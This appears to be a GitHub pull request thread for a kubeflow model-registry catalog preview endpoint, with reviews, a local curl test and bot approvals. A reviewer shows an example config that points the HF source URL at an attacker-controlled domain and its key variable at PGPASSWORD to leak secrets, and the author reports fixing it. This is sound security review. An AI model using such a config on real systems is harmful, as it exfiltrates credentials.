feat: catalog preview endpoint
Description
How Has This Been Tested?
Merge criteria:
- All the commits have been signed-off (To pass the
DCOcheck)
- [ ] The commits have meaningful messages
- [ ] Automated tests are provided as part of the PR for major new functionalities; testing instructions have been added in the PR body (for PRs involving changes that are not immediately obvious).
- [ ] The developer has manually tested the changes and verified that the changes work.
- [ ] Code changes follow the kubeflow contribution guidelines.
- [ ] For first time contributors: Please reach out to the Reviewers to ensure all tests are being run, ensuring the label
ok-to-testhas been added to the PR.
cc @mturley @manaswinidas
I'm still testing this, but I see a security problem with the HF preview functionality. The ability to set the URL and the environment variable name would allow an attacker to leak at least the HF token and (unless I missed some validation) unrelated environment variables. For example:
type: hf includedModels: - "microsoft/*" properties: apiKeyEnvVar: PGPASSWORD url: https://some-attacker-controlled-domain.com
thanks for your review @pboyd , yes indeed this a serious security concern!
I added a logic in preview to delete the url property here https://github.com/kubeflow/model-registry/pull/1918/commits/1ae175129773bfe3336356a040f3fd93787b8b58 and I have also added a log warning when someone tries to use a custom url for the hf type https://github.com/kubeflow/model-registry/pull/1918/commits/a69d9db0865da5c5270b0368a5307f06495dd58c
Outside of the security thing, and the merge conflict this looks really good. I tested it and it's working well.
For anyone else who wants to try it:
$ curl -s -F [email protected] -F catalogData=@catalog/internal/catalog/testdata/dev-community-models.yaml 'http://localhost:8082/api/model_catalog/v1alpha1/sources/preview' | jq . { "items": [ { "included": true, "name": "open-models/falcon-mini-2b" }, { "included": true, "name": "quantum-research/sentiment-analyzer-base" }, { "included": true, "name": "indie-ai/creative-writer-3b" }, { "included": true, "name": "alpha-labs/translation-mini-1b" } ], "nextPageToken": "", "pageSize": 10, "size": 4, "summary": { "excludedModels": 0, "includedModels": 4, "totalModels": 4 } }Where
config.yamlis:type: yamlOne thing that's a little annoying is that I can't use just paste a full source config entry. For instance, I took this from
dev-sources.yaml:name: "Community and Custom Models" id: community_custom_models type: yaml enabled: trueBut I can't preview it because of the extra fields (
name,id,enabled). I know they're meaningless for preview, but could it ignore the extra fields so we can preview the same format that we'll save later?
After https://github.com/kubeflow/model-registry/pull/1918/commits/f9a85f1308509aefed21325866517ef7f2c21f4d it should be possible the use a full source
Thanks for the fixes.
/lgtm /retest
- https://github.com/kubeflow/model-registry/pull/1918#pullrequestreview-3545760668
/approve
[APPROVALNOTIFIER] This PR is APPROVED
This pull-request has been approved by: Al-Pragliola
The full list of commands accepted by this bot can be found here.
The pull request process is described here
- ~~OWNERS~~ [Al-Pragliola]
Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment